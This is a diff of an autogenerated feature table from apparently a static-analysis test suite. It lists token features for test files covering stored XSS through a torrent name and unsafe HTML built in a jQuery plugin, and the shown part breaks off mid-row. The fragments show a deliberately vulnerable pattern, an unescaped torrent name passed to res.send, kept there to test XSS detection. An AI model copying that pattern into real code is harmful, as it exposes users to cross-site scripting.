exceptional return of anonymous function | enclosingFunctionBody | req res torrent parseTorrent unknown name torrent name res send name | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:28:8:1 | exceptional return of anonymous function | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:28:8:1 | exceptional return of anonymous function | fileImports | express parse-torrent | | autogenerated/Xss/StoredXss/xss-through-torrent.js:4:28:8:1 | functio ... OT OK\\n} | CalleeFlexibleAccessPath | express().get | | autogenerated/Xss/StoredXss/xss-through-torrent.js:4:28:8:1 | functio ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/StoredXss/xss-through-torrent.js:4:28:8:1 | functio ... OT OK\\n} | calleeImports | express | | autogenerated/Xss/StoredXss/xss-through-torrent.js:4:28:8:1 | functio ... OT OK\\n} | contextFunctionInterfaces | | | autogenerated/Xss/StoredXss/xss-through-torrent.js:4:28:8:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/StoredXss/xss-through-torrent.js:4:28:8:1 | functio ... OT OK\\n} | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:28:8:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:28:8:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:28:8:1 | return of anonymous function | enclosingFunctionBody | req res torrent parseTorrent unknown name torrent name res send name | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:28:8:1 | return of anonymous function | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:28:8:1 | return of anonymous function | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:37:4:39 | req | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:37:4:39 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:37:4:39 | req | enclosingFunctionBody | req res torrent parseTorrent unknown name torrent name res send name | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:37:4:39 | req | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:37:4:39 | req | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:42:4:44 | res | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:42:4:44 | res | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:42:4:44 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:42:4:44 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:42:4:44 | res | enclosingFunctionBody | req res torrent parseTorrent unknown name torrent name res send name | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:42:4:44 | res | enclosingFunctionBody | req res torrent parseTorrent unknown name torrent name res send name | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:42:4:44 | res | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:42:4:44 | res | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:42:4:44 | res | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:4:42:4:44 | res | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:5:6:5:12 | torrent | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:5:6:5:12 | torrent | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:5:6:5:12 | torrent | enclosingFunctionBody | req res torrent parseTorrent unknown name torrent name res send name | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:5:6:5:12 | torrent | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:5:6:5:12 | torrent | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:5:6:5:36 | torrent | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:5:6:5:36 | torrent | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:5:6:5:36 | torrent | enclosingFunctionBody | req res torrent parseTorrent unknown name torrent name res send name | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:5:6:5:36 | torrent | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:5:6:5:36 | torrent | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:5:6:5:36 | torrent ... nknown) | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:5:6:5:36 | torrent ... nknown) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:5:6:5:36 | torrent ... nknown) | enclosingFunctionBody | req res torrent parseTorrent unknown name torrent name res send name | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:5:6:5:36 | torrent ... nknown) | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:5:6:5:36 | torrent ... nknown) | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:5:16:5:27 | parseTorrent | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:5:16:5:27 | parseTorrent | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:5:16:5:27 | parseTorrent | enclosingFunctionBody | req res torrent parseTorrent unknown name torrent name res send name | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:5:16:5:27 | parseTorrent | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:5:16:5:27 | parseTorrent | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:5:16:5:36 | exceptional return of parseTo ... nknown) | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:5:16:5:36 | exceptional return of parseTo ... nknown) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:5:16:5:36 | exceptional return of parseTo ... nknown) | enclosingFunctionBody | req res torrent parseTorrent unknown name torrent name res send name | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:5:16:5:36 | exceptional return of parseTo ... nknown) | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:5:16:5:36 | exceptional return of parseTo ... nknown) | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:5:16:5:36 | parseTo ... nknown) | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:5:16:5:36 | parseTo ... nknown) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:5:16:5:36 | parseTo ... nknown) | enclosingFunctionBody | req res torrent parseTorrent unknown name torrent name res send name | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:5:16:5:36 | parseTo ... nknown) | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:5:16:5:36 | parseTo ... nknown) | fileImports | express parse-torrent | | autogenerated/Xss/StoredXss/xss-through-torrent.js:5:29:5:35 | unknown | CalleeFlexibleAccessPath | parseTorrent | | autogenerated/Xss/StoredXss/xss-through-torrent.js:5:29:5:35 | unknown | InputArgumentIndex | 0 | | autogenerated/Xss/StoredXss/xss-through-torrent.js:5:29:5:35 | unknown | calleeImports | parse-torrent | @@ -22532,6 +149565,61 @@ tokenFeatures | autogenerated/Xss/StoredXss/xss-through-torrent.js:5:29:5:35 | unknown | enclosingFunctionBody | req res torrent parseTorrent unknown name torrent name res send name | | autogenerated/Xss/StoredXss/xss-through-torrent.js:5:29:5:35 | unknown | enclosingFunctionName | get#functionalargument | | autogenerated/Xss/StoredXss/xss-through-torrent.js:5:29:5:35 | unknown | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:6:6:6:9 | name | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:6:6:6:9 | name | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:6:6:6:9 | name | enclosingFunctionBody | req res torrent parseTorrent unknown name torrent name res send name | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:6:6:6:9 | name | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:6:6:6:9 | name | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:6:6:6:24 | name | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:6:6:6:24 | name | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:6:6:6:24 | name | enclosingFunctionBody | req res torrent parseTorrent unknown name torrent name res send name | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:6:6:6:24 | name | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:6:6:6:24 | name | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:6:6:6:24 | name = torrent.name | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:6:6:6:24 | name = torrent.name | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:6:6:6:24 | name = torrent.name | enclosingFunctionBody | req res torrent parseTorrent unknown name torrent name res send name | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:6:6:6:24 | name = torrent.name | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:6:6:6:24 | name = torrent.name | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:6:13:6:19 | torrent | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:6:13:6:19 | torrent | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:6:13:6:19 | torrent | enclosingFunctionBody | req res torrent parseTorrent unknown name torrent name res send name | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:6:13:6:19 | torrent | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:6:13:6:19 | torrent | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:6:13:6:24 | torrent.name | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:6:13:6:24 | torrent.name | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:6:13:6:24 | torrent.name | enclosingFunctionBody | req res torrent parseTorrent unknown name torrent name res send name | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:6:13:6:24 | torrent.name | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:6:13:6:24 | torrent.name | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:6:21:6:24 | name | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:6:21:6:24 | name | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:6:21:6:24 | name | enclosingFunctionBody | req res torrent parseTorrent unknown name torrent name res send name | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:6:21:6:24 | name | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:6:21:6:24 | name | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:7:2:7:4 | res | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:7:2:7:4 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:7:2:7:4 | res | enclosingFunctionBody | req res torrent parseTorrent unknown name torrent name res send name | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:7:2:7:4 | res | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:7:2:7:4 | res | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:7:2:7:9 | res.send | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:7:2:7:9 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:7:2:7:9 | res.send | enclosingFunctionBody | req res torrent parseTorrent unknown name torrent name res send name | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:7:2:7:9 | res.send | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:7:2:7:9 | res.send | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:7:2:7:15 | exceptional return of res.send(name) | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:7:2:7:15 | exceptional return of res.send(name) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:7:2:7:15 | exceptional return of res.send(name) | enclosingFunctionBody | req res torrent parseTorrent unknown name torrent name res send name | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:7:2:7:15 | exceptional return of res.send(name) | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:7:2:7:15 | exceptional return of res.send(name) | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:7:2:7:15 | res.send(name) | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:7:2:7:15 | res.send(name) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:7:2:7:15 | res.send(name) | enclosingFunctionBody | req res torrent parseTorrent unknown name torrent name res send name | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:7:2:7:15 | res.send(name) | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:7:2:7:15 | res.send(name) | fileImports | express parse-torrent | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:7:6:7:9 | send | contextFunctionInterfaces | | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:7:6:7:9 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:7:6:7:9 | send | enclosingFunctionBody | req res torrent parseTorrent unknown name torrent name res send name | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:7:6:7:9 | send | enclosingFunctionName | get#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-torrent.js:7:6:7:9 | send | fileImports | express parse-torrent | | autogenerated/Xss/StoredXss/xss-through-torrent.js:7:11:7:14 | name | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/StoredXss/xss-through-torrent.js:7:11:7:14 | name | InputArgumentIndex | 0 | | autogenerated/Xss/StoredXss/xss-through-torrent.js:7:11:7:14 | name | contextFunctionInterfaces | | @@ -22540,6 +149628,106 @@ tokenFeatures | autogenerated/Xss/StoredXss/xss-through-torrent.js:7:11:7:14 | name | enclosingFunctionName | get#functionalargument | | autogenerated/Xss/StoredXss/xss-through-torrent.js:7:11:7:14 | name | fileImports | express parse-torrent | | autogenerated/Xss/StoredXss/xss-through-torrent.js:7:11:7:14 | name | receiverName | res | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:1:1:0 | this | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:1:1:0 | this | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:1:9:3 | (functi ... OK\\n})) | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:1:9:3 | (functi ... OK\\n})) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:1:9:3 | (functi ... OK\\n})) | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:2:1:1 | this | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:2:1:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:2:1:1 | this | enclosingFunctionBody | factory define function define amd define jquery jquery-ui factory factory jQuery | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:2:1:1 | this | enclosingFunctionName | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:2:1:1 | this | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:2:7:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:2:7:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:2:7:1 | 'arguments' object of anonymous function | enclosingFunctionBody | factory define function define amd define jquery jquery-ui factory factory jQuery | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:2:7:1 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:2:7:1 | 'arguments' object of anonymous function | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:2:7:1 | exceptional return of anonymous function | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:2:7:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:2:7:1 | exceptional return of anonymous function | enclosingFunctionBody | factory define function define amd define jquery jquery-ui factory factory jQuery | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:2:7:1 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:2:7:1 | exceptional return of anonymous function | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:2:7:1 | functio ... );\\n\\t}\\n} | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:2:7:1 | functio ... );\\n\\t}\\n} | contextSurroundingFunctionParameters | (factory) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:2:7:1 | functio ... );\\n\\t}\\n} | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:2:7:1 | return of anonymous function | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:2:7:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:2:7:1 | return of anonymous function | enclosingFunctionBody | factory define function define amd define jquery jquery-ui factory factory jQuery | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:2:7:1 | return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:2:7:1 | return of anonymous function | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:2:9:2 | exceptional return of functio ... / OK\\n}) | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:2:9:2 | exceptional return of functio ... / OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:2:9:2 | exceptional return of functio ... / OK\\n}) | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:2:9:2 | functio ... / OK\\n}) | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:2:9:2 | functio ... / OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:2:9:2 | functio ... / OK\\n}) | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:12:1:18 | factory | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:12:1:18 | factory | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:12:1:18 | factory | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:12:1:18 | factory | contextSurroundingFunctionParameters | (factory) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:12:1:18 | factory | enclosingFunctionBody | factory define function define amd define jquery jquery-ui factory factory jQuery | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:12:1:18 | factory | enclosingFunctionBody | factory define function define amd define jquery jquery-ui factory factory jQuery | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:12:1:18 | factory | enclosingFunctionName | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:12:1:18 | factory | enclosingFunctionName | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:12:1:18 | factory | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:1:12:1:18 | factory | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:6:2:18 | typeof define | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:6:2:18 | typeof define | contextSurroundingFunctionParameters | (factory) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:6:2:18 | typeof define | enclosingFunctionBody | factory define function define amd define jquery jquery-ui factory factory jQuery | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:6:2:18 | typeof define | enclosingFunctionName | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:6:2:18 | typeof define | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:6:2:33 | typeof ... nction' | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:6:2:33 | typeof ... nction' | contextSurroundingFunctionParameters | (factory) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:6:2:33 | typeof ... nction' | enclosingFunctionBody | factory define function define amd define jquery jquery-ui factory factory jQuery | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:6:2:33 | typeof ... nction' | enclosingFunctionName | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:6:2:33 | typeof ... nction' | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:6:2:47 | typeof ... ine.amd | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:6:2:47 | typeof ... ine.amd | contextSurroundingFunctionParameters | (factory) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:6:2:47 | typeof ... ine.amd | enclosingFunctionBody | factory define function define amd define jquery jquery-ui factory factory jQuery | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:6:2:47 | typeof ... ine.amd | enclosingFunctionName | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:6:2:47 | typeof ... ine.amd | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:13:2:18 | define | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:13:2:18 | define | contextSurroundingFunctionParameters | (factory) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:13:2:18 | define | enclosingFunctionBody | factory define function define amd define jquery jquery-ui factory factory jQuery | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:13:2:18 | define | enclosingFunctionName | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:13:2:18 | define | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:24:2:33 | 'function' | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:24:2:33 | 'function' | contextSurroundingFunctionParameters | (factory) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:24:2:33 | 'function' | enclosingFunctionBody | factory define function define amd define jquery jquery-ui factory factory jQuery | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:24:2:33 | 'function' | enclosingFunctionName | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:24:2:33 | 'function' | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:38:2:43 | define | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:38:2:43 | define | contextSurroundingFunctionParameters | (factory) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:38:2:43 | define | enclosingFunctionBody | factory define function define amd define jquery jquery-ui factory factory jQuery | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:38:2:43 | define | enclosingFunctionName | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:38:2:43 | define | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:38:2:47 | define.amd | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:38:2:47 | define.amd | contextSurroundingFunctionParameters | (factory) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:38:2:47 | define.amd | enclosingFunctionBody | factory define function define amd define jquery jquery-ui factory factory jQuery | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:38:2:47 | define.amd | enclosingFunctionName | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:38:2:47 | define.amd | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:45:2:47 | amd | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:45:2:47 | amd | contextSurroundingFunctionParameters | (factory) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:45:2:47 | amd | enclosingFunctionBody | factory define function define amd define jquery jquery-ui factory factory jQuery | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:45:2:47 | amd | enclosingFunctionName | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:2:45:2:47 | amd | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:3:3:8 | define | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:3:3:8 | define | contextSurroundingFunctionParameters | (factory) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:3:3:8 | define | enclosingFunctionBody | factory define function define amd define jquery jquery-ui factory factory jQuery | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:3:3:8 | define | enclosingFunctionName | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:3:3:8 | define | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:3:3:42 | define( ... actory) | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:3:3:42 | define( ... actory) | contextSurroundingFunctionParameters | (factory) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:3:3:42 | define( ... actory) | enclosingFunctionBody | factory define function define amd define jquery jquery-ui factory factory jQuery | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:3:3:42 | define( ... actory) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:3:3:42 | define( ... actory) | fileImports | jquery jquery-ui | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:3:3:42 | exceptional return of define( ... actory) | contextFunctionInterfaces | myPlugin(stuff, options) | +| autogenerated/Xss/UnsafeHtmlConstruction/jquery-plugin.js:3:3:3:42 | exceptional return of define( ... actory) | 